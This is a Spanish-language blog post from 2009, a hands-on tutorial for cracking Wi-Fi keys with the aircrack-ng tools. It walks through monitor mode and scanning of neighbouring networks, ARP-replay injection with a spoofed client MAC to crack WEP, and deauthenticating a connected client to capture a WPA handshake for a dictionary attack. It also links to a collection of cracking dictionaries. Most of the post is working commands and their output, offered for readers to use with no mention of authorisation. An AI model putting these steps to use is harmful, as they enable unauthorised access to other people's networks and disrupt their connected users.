Potterpig
Wireless Hacking Wep - Wpa
by Andrés Morantes on Nov.22, 2009, under
Se que este ataque es algo viejo, pero lo posteo debido a que muchas veces me han preguntado sobre este tema y siempre les paso un manual que hice algun tiempo, asi pues, pienso que es mejor que quede en mi blog.
Bueno lo primero que tienen que hacer repito, es instalar Linux, estos ataques siempre son mas efectivos en las plataformas *NIX gracias a que los drivers ya hacen parte del kernel (en la mayoría de las ocasiones), además que les recomiendo Linux porque ya trae una cantidad de herramientas listicas para que uno las pruebe.
Otra cosa es saber escoger una buena wireless, yo personalmente les recomiendo las Ralink viejitas, ya que tienen mejor soporte en Linux. Otra un poco mas carita pero que en realidad es la mejor de todas son las Atheros, se van acordar de mi … ya que estas las usan muchos auditores de seguridad, incluso pueden buscar las D-link que ya vienen con este chipset, las D-link viejitas también son buenas, estas traen chipset Ralink. Por otro lado están las wireless de Windows la verdad algunas son buenas otras no mucho aunque hoy en día si corren con suerte Linux ya tendrá soporte, estas son las famosas Broadcom y algunas Intel que son las que vienen con los portatiles de HP y Compaq … así que prueben primero de la siguiente forma:
spiderpig:~# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
eth1 no wireless extensions.
wlan0 RT73 WLAN ESSID:"SPIDERPIG"
Mode:Managed Frequency=2.437 GHz Access Point: 00:1B:11:D4:54:63
Bit Rate=54 Mb/s
RTS thr:off Fragment thr:off
Encryption key: xxxxxxxxx
Link Quality=91/100 Signal level:-34 dBm Noise level:-79 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Fíjense que mi PC tiene 3 interfaces, la eth0 la eth1 y la wlan0. Mi tarjeta wireless en este caso seria la wlan0 que tiene chipset RT73, no siempre tendrá el mismo nombre de las interfaces por eso es que deben empezar por acá, asegúrense primero el nombre sus interfaces, de acá en adelante mi tarjeta wireless será wlan0. Si aparece después de este comando significa que Linux la detecto, ahora la otra prueba de oro es saber si puedo pasarla a modo Monitor, recuerden que este modo es como el modo promiscuo solo que la wireless detecta las redes que tiene a su alcance. Para saber si esta en modo monitor se ejecuta el siguiente comando:
spiderpig:~# iwconfig wlan0 mode monitor
Ahora se probara que este en modo monitor, para esto ejecutamos de nuevo iwconfig:
spiderpig:~# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
eth1 no wireless extensions.
wlan0 RT73 WLAN ESSID:""
Mode:Monitor Frequency=2.437 GHz Bit Rate=48 Mb/s
RTS thr:off Fragment thr:off
Encryption key:off
Link Quality=89/100 Signal level:-32 dBm Noise level:-115 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
nota> si arroja algún error al pasarlo a modo monitor, se deberán bajar los driver directamente desde la pagina de aircrack y compilarlo.
Fíjense que ya cambio el modo, esto da luz verde a empezar a hacer el ataque.
Ahora se ejecutará el sniffing para detectar redes cercanas y usuarios asociados (“usuarios que estén conectados a algún Access Point”).
spiderpig:~# airodump-ng wlan0
Al lanzar este comando verán algo parecido a esto, podrán ver que en la parte izquierda donde dice CH empezara variar, eso significa que la wireless esta cambiando los canales para detectar redes. Esto mas que todo detecta redes de mayor potencia, se podría poner a escuchar redes en un solo canal, así que no es nada raro que encuentren mas redes al ponerlo a escuchar en un solo canal.
CH 5 ][ Elapsed: 56 s ][ 2008-06-08 14:02
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:0F:3D:FA:20:EE 100 2 0 0 1 11 OPN Telebucaramanga
00:0F:3D:FA:59:7F 104 18 0 0 1 11 OPN Telebucaramanga
00:16:B6:31:04:B9 100 4 0 0 6 48. WPA TKIP PSK eparrar
00:1B:11:09:7F:30 100 10 0 0 6 54. WEP WEP TGI-03
00:17:3F:F2:59:A4 98 3 0 0 11 48 OPN belkin54g
00:1B:11:D4:54:63 82 15 86 0 6 54 WEP WEP SPIDERPIG
00:00:00:00:00:00 -1 0 28 3 8 -1 OPN
BSSID STATION PWR Rate Lost Packets Probes
00:1B:11:D4:54:63 00:0E:35:8C:1C:1D 83 54- 0 0 5
00:00:00:00:00:00 00:02:2D:28:71:FB 101 0-11 0 28
(not associated) 00:1D:D9:2C:EF:DF 104 0- 1 0 5UNEIntercable,YOYI,Telebucaramanga
El atacante ve que SPIDERPIG tiene encriptación WEP y que además esta enviando datos y actualmente esta en el canal 6. Así que se pone el airodump a escuchar nada más a ese Access Point de la siguiente forma:
spiderpig:~# airodump-ng -c6 --bssid 00:1B:11:D4:54:63 -w spider wlan0
-w spider significa que va a crear un archivo que se llama spider, esto servirá después para poder descifrar la llave. Por lo general el crea 2 archivos uno spider-01.txt y un spider-01.cap. El txt se crea por comodidad, para poder ver las tramas creadas en un archivos de texto incluso para poder crear tramas ARP falsas cuando no tengamos usuarios asociados, los ataques son mas efectivos con alguien asociado pero podemos entrar al access point a las malas como quien dice y obligar al access point a que de información de los IVS que son las cabeceras de las tramas, ahí es donde se encuentra las llaves de acceso, el .cap son los tipos de archivos que se crean como captura de trafico, algo parecido a los archivos que crea el wireshark.
CH 6 ][ Elapsed: 40 s ][ 2008-06-08 19:46
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1B:11:D4:54:63 81 98 327 1033 89 6 54 WPA TKIP PSK SPIDERPIG
BSSID STATION PWR Rate Lost Packets Probes
00:1B:11:D4:54:63 00:0E:35:8C:1C:1D 78 36-54 39 1012
Ahora el truco es la inyección de tráfico ARP al Access Point, la idea de este ataque es obligar al Access Point a que de información de su tabla ARP para que el atacante recoja información sobre las IVS. Entonces en otra ventana y sin dejar de ejecutar el airodump se ejecutar este otro comando:
spiderpig:~# aireplay-ng -3 -b 00:1B:11:D4:54:63 -h 00:0E:35:8C:1C:1D -x 1024 wlan0
El -3 significa un ataque de inyección de ARP el –b es la MAC del Access Point el –h es la MAC del cliente que esta asociado al Access Point el –x son la cantidad de paquetes por segundo que se le enviara al access point.
spiderpig:~# aireplay-ng -3 -b 00:1B:11:D4:54:63 -h 00:0E:35:8C:1C:1D -x 1024 wlan0
The interface MAC (00:1B:11:20:D2:27) doesn't match the specified MAC (-h).
ifconfig wlan0 hw ether 00:0E:35:8C:1C:1D
20:37:07 Waiting for beacon frame (BSSID: 00:1B:11:D4:54:63) on channel 6
Saving ARP requests in replay_arp-0608-203707.cap
You should also start airodump-ng to capture replies.
Read 82899 packets (got 145 ARP requests and 0 ACKs), sent 727522 packets...(1024 pps)?
Se sabrá que el ataque ha empezado cuando sent xxxx packets haya empezado a subir, también podremos ver que la cantidad de IVS enviados ha aumentado, esto podría tomarse como la forma de aumentar los IVS( “los IVS son los mismos que se muestra en la pantalla de airodump en la parte de #Data”)
CH 6 ][ Elapsed: 18 mins ][ 2008-06-08 20:55
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1B:11:D4:54:63 81 48 8472 7003 117 6 54 WEP WEP SPIDERPIG
BSSID STATION PWR Rate Lost Packets Probes
00:1B:11:D4:54:63 00:0E:35:8C:1C:1D 116 48-54 31 107446
Si se fijan los paquetes han aumentado de 1033 a 7003 considerablemente.
Ahora por ultimo pondremos a descifrar la clave, esta es la parte más fácil y maravillosa, porque es automática. Por lo general el aircrack necesita como mínimo tomar 5000 IVS, si no son suficientes el le dirá que aumente los IVS a 10000 así consecutivamente de 5000 en 5000. Lo bueno de esto es que después de ejecutar este comando y al salir este error el continuara su trabajo cuando ud ya tenga los 10000 IVS.
Así que podrá ejecutar este comando al momento de ejecutar el ataque de ARP, mientras tanto podrá ir a ver la novela para que no se pierda ningún momento o a ver una película o salir, el hará todo el trabajo por ud. Según nuestras pruebas mínimo eran 25000 IVS yo alguna vez alcance a necesitar 35000 IVS y hasta 40000IVS eso por la lejanía del Access Point, y claro después de 2 horas obtuve la clave, pero eso sí de que es fijo tener la clave es fijo, y alégrense cuando salga el mensaje de KEY FOUND!
HACKING WPA
En WPA la única forma de poder hacker es con diccionario, pues si quieren intentar pues acá le tengo la formula, el secreto de este ataque es tener un buen diccionario.
Para esto usaremos una inyeccion agresiva deautenticando a un usuario para obtener un handshake, asi que empezaremos usando el airodump como lo había usado antes
spiderpig:~# airodump-ng -c6 --bssid 00:1B:11:D4:54:63 -w spider wlan0
Luego en otra ventana ejecuntan esto:
spiderpig:~/hackwifi# aireplay-ng -0 5 -a 00:1B:11:D4:54:63 -c 00:0E:35:8C:1C:1D -wlan0
Esto hace que deatentiquen a un usuario para poder escucharlo y obtener algunas tramas, y poder pasar al ataque de diccionario. El -0 siginifica deutenticacion y seguido se le manda la cantidad de deautenticaciones que quiere enviar, con 5 son suficientes.
Después de esto se debe ejecutar el wpa de la siguiente forma:
spiderpig:~/hackwifi# aircrack-ng -a 2 -0 -w /media/win2/Andres/dictionaries/word/word.lst spider.cap
-a siginifica modo de ataque seguido de 2 que significa WPA/WPA2 – PSK –w siginifica la dirección del diccionario, pueden intentar en esta pagina, estan organizados por idioma, http://wifi0wn.wordpress.com/wepwpawpa2-cracking-dictionary/
Opening spider-01.cap
Read 308 packets.
# BSSID ESSID Encryption
1 00:1B:11:D4:54:63 SPIDERPIG WPA (1 handshake)
2 00:16:B6:31:04:B9 eparrar WPA (0 handshake)
Index number of target network ?
Al ver que obtenga un handshake como en este caso el de SPIDERPIG solo queda escoger esta red, osea oprimimos 1 y damos ENTER. Aircrack tratara de descifrar la clave con el diccionario, la verdad no se cuanto se demore esto,lo cierto es que hay que tener algo de paciencia.
0 comentarios